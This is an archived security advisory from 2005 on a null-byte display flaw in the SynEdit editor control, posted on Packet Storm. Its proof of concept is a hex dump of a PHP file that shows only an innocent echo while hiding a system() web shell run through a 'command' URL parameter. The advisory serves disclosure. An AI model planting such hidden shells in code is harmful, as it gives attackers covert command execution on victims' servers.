what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

syn.html

syn.html
Posted Aug 10, 2005
Authored by rgod | Site retrogod.altervista.org

Synedit 2.0.1 has a null byte insertion / code obfuscation flaws.

tags | advisory
SHA-256 | db192550b50828c6a674a11b7ce0d09bcf2711b3bde09aad38aebd14ec305e52

syn.html

Change Mirror Download
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-number">23.47 08/08/2005

Synedit 2.0.1 (possibly prior versions) null byte insertion / code obfuscation


software description:SynEdit is an advanced multi-line edit control,
for Borland Delphi, Kylix (Kylix is supported into latest cvs) and C++Builder.
It supports Syntax Highlighting and code completion,
it does include exporters for html,tex and rtf.

exploit: a user can craft a malicious file using null byte (%00) to obfuscate
code and hide malicious instrunctions to the victim user

poc:

this an exadecimal dump of the file:

3c 3f 70 68 70 20 65 63 68 6f 20 27 68 65 6c 6c < ? p h p e c h o ' h e l l
6f 21 27 3b 00 20 73 79 73 74 65 6d 28 24 48 54 o ! ' ; s y s t e m ( $ H T
54 50 5f 47 45 54 5f 56 41 52 53 5b 63 6f 6d 6d T P _ G E T _ V A R S [ c o m m
61 6e 64 5d 29 3b 20 3f 3e a n d ] ) ; ? >

the file hides a php system shell.
Try to open it in Dev PHP, PHP Designer 2005 or other developing software using
Synedit.

It looks like this:

<?php echo 'hello!';

but when you call this url:

http://[some_host]/[path]/poc.php?command=dir

dir command will be executed...

Tested on:
Microsoft Visual C++ 6.0
Borland Delphi 7.0 Enterprise Edition
PHP Designer 2005 2.2.8
Dev-PHP Version: 2.0.12
Bloodshed Dev-Pascal 1.9.2

on Windows XP Service Pack 2
and so on...


rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta.it
</span></span>
</code></pre>
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close